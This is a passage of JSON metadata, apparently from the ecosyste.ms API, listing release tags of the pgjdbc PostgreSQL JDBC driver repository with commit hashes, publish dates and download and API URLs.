leases/tag/REL42.7.6-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.6-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.6-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.6-rc1/manifests"},{"name":"REL42.7.5","sha":"94a1693a61d612dcdbb9c4d01c1e217326a0c044","kind":"tag","published_at":"2025-01-14T15:02:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.5/manifests"},{"name":"REL42.7.5-rc1","sha":"94a1693a61d612dcdbb9c4d01c1e217326a0c044","kind":"tag","published_at":"2025-01-14T14:58:53.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.5-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.5-rc1/manifests"},{"name":"REL42.7.4","sha":"a23fa7077f220180e2db365abf3144f84b6033fb","kind":"tag","published_at":"2024-08-22T16:44:41.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.4/manifests"},{"name":"REL42.7.4-rc1","sha":"a23fa7077f220180e2db365abf3144f84b6033fb","kind":"tag","published_at":"2024-08-22T14:09:21.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.4-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.4-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.4-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.4-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.4-rc1/manifests"},{"name":"REL42.2.30-rc1","sha":"c6bbbc2ccc44cf099bf6b5973896a97636c5e32b","kind":"tag","published_at":"2024-04-09T12:32:45.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.30-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.30-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.30-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.30-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.30-rc1/manifests"},{"name":"REL42.7.3","sha":"818953a2b30480ecc874f812e46fcb82d1a395fd","kind":"tag","published_at":"2024-03-14T18:45:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.3/manifests"},{"name":"REL42.7.3-rc1","sha":"818953a2b30480ecc874f812e46fcb82d1a395fd","kind":"tag","published_at":"2024-03-14T18:42:34.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.3-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.3-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.3-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.3-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.3-rc1/manifests"},{"name":"REL42.6.2","sha":"6fa2ca102b842cebad9b45db7c147e6d41d3b93d","kind":"tag","published_at":"2024-03-13T18:57:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.2/manifests"},{"name":"REL42.6.2-rc2","sha":"6fa2ca102b842cebad9b45db7c147e6d41d3b93d","kind":"tag","published_at":"2024-03-13T18:57:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.2-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.2-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.2-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.2-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.2-rc2/manifests"},{"name":"REL42.5.6","sha":"b9953dc45e1607ec1db292f59768f857b75386ef","kind":"tag","published_at":"2024-03-13T18:48:27.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.6","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.6/manifests"},{"name":"REL42.5.6-rc1","sha":"b9953dc45e1607ec1db292f59768f857b75386ef","kind":"tag","published_at":"2024-03-13T18:46:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.6-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.6-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.6-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.6-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.6-rc1/manifests"},{"name":"REL42.4.5","sha":"a4a957ac0e9ee93cdae2fd51f782cda3b7be711b","kind":"tag","published_at":"2024-03-13T18:39:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.5/manifests"},{"name":"REL42.3.10","sha":"b0326938dd31d995aedaaca830d974ec05881d75","kind":"tag","published_at":"2024-03-13T18:33:19.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.10","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.10/manifests"},{"name":"REL42.3.10-rc1","sha":"b0326938dd31d995aedaaca830d974ec05881d75","kind":"tag","published_at":"2024-03-13T18:30:47.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.10-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.10-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.10-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.10-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.10-rc1/manifests"},{"name":"REL42.2.29","sha":"d8fadb386f95cd6ab08f9c59fde3ca4b8af04eac","kind":"tag","published_at":"2024-03-13T18:27:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.29","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.29/manifests"},{"name":"REL42.2.29-rc1","sha":"d8fadb386f95cd6ab08f9c59fde3ca4b8af04eac","kind":"tag","published_at":"2024-03-13T18:21:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.29-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.29-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.29-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.29-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.29-rc1/manifests"},{"name":"REL42.4.5-rc1","sha":"a4a957ac0e9ee93cdae2fd51f782cda3b7be711b","kind":"tag","published_at":"2024-03-08T14:02:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.5-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.5-rc1/manifests"},{"name":"REL42.2.28","sha":"990d63f6be401ab40de5eb303a75924c9e71903c","kind":"tag","published_at":"2024-02-21T00:47:40.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.28","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.28/manifests"},{"name":"REL42.2.28-rc1","sha":"990d63f6be401ab40de5eb303a75924c9e71903c","kind":"tag","published_at":"2024-02-21T00:45:58.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.28-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.28-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.28-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.28-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.28-rc1/manifests"},{"name":"REL42.3.9","sha":"d93c74127f5aebda2baa8fcefed4f0b4dfe81d95","kind":"tag","published_at":"2024-02-21T00:42:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.9","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.9/manifests"},{"name":"REL42.3.9-rc1","sha":"d93c74127f5aebda2baa8fcefed4f0b4dfe81d95","kind":"tag","published_at":"2024-02-21T00:42:10.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.9-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.9-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.9-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.9-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.9-rc1/manifests"},{"name":"REL42.4.4","sha":"fe002b31f2c7dcf7e2fe75fe7fd18df4e4503abf","kind":"tag","published_at":"2024-02-21T00:37:52.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.4/manifests"},{"name":"REL42.4.4-rc1","sha":"fe002b31f2c7dcf7e2fe75fe7fd18df4e4503abf","kind":"tag","published_at":"2024-02-21T00:37:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.4-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.4-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.4-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.4-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.4-rc1/manifests"},{"name":"REL42.5.5","sha":"475e3e2af3033c666fc1c0015159b35455118ae5","kind":"tag","published_at":"2024-02-21T00:25:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.5/manifests"},{"name":"REL42.5.5-rc1","sha":"475e3e2af3033c666fc1c0015159b35455118ae5","kind":"tag","published_at":"2024-02-21T00:24:27.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.5-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.5-rc1/manifests"},{"name":"REL42.6.1","sha":"d368b1cc5fbfc9750151f87d78e12db97e13af0e","kind":"tag","published_at":"2024-02-21T00:16:34.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.1/manifests"},{"name":"REL42.6.1-rc1","sha":"d368b1cc5fbfc9750151f87d78e12db97e13af0e","kind":"tag","published_at":"2024-02-21T00:15:35.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.1-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.1-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.1-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.1-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.1-rc1/manifests"},{"name":"REL42.7.2-rc5","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"tag","published_at":"2024-02-20T23:53:58.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2-rc5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc5/manifests"},{"name":"REL42.7.2-rc4","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"tag","published_at":"2024-02-20T16:35:22.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2-rc4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc4/manifests"},{"name":"REL42.7.2-rc3","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"tag","published_at":"2024-02-20T15:49:24.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2-rc3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc3/manifests"},{"name":"REL42.7.2-rc2","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"tag","published_at":"2024-02-20T15:25:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc2/manifests"},{"name":"REL42.7.2-rc1","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"tag","published_at":"2024-02-20T15:10:07.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc1/manifests"},{"name":"REL42.7.2","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"commit","published_at":"2024-02-20T15:01:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2/manifests"},{"name":"REL42.7.1","sha":"27bbccfeb73eec105057e53ae6068faf0e6f40b2","kind":"tag","published_at":"2023-12-06T15:32:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1/manifests"},{"name":"REL42.7.1-rc2","sha":"27bbccfeb73eec105057e53ae6068faf0e6f40b2","kind":"tag","published_at":"2023-12-06T15:26:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.1-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.1-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.1-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1-rc2/manifests"},{"name":"REL42.7.1-rc1","sha":"bb577e0a7afb0df74a9a00d43896ada2c1dd0dfc","kind":"tag","published_at":"2023-12-06T15:08:37.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.1-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.1-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.1-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1-rc1/manifests"},{"name":"REL42.7.0","sha":"1566eed0caeb26108f9df1d28255538767b7676f","kind":"tag","published_at":"2023-11-20T19:04:47.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.0/manifests"},{"name":"REL42.7.0-rc3","sha":"1566eed0caeb26108f9df1d28255538767b7676f","kind":"tag","published_at":"2023-11-20T18:11:04.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.0-rc3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.0-rc3/manifests"},{"name":"REL42.6.0","sha":"d6a0cc2babc5e5a4cef0a8eafd1b36198d8e3873","kind":"tag","published_at":"2023-03-17T22:10:29.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.0/manifests"},{"name":"REL42.6.0-rc1","sha":"d6a0cc2babc5e5a4cef0a8eafd1b36198d8e3873","kind":"tag","published_at":"2023-03-17T22:07:45.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.0-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.0-rc1/manifests"},{"name":"REL42.5.4","sha":"051ae1b75a08a695ce1f96bcea7ce7ca49f798c9","kind":"tag","published_at":"2023-02-16T14:41:18.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@R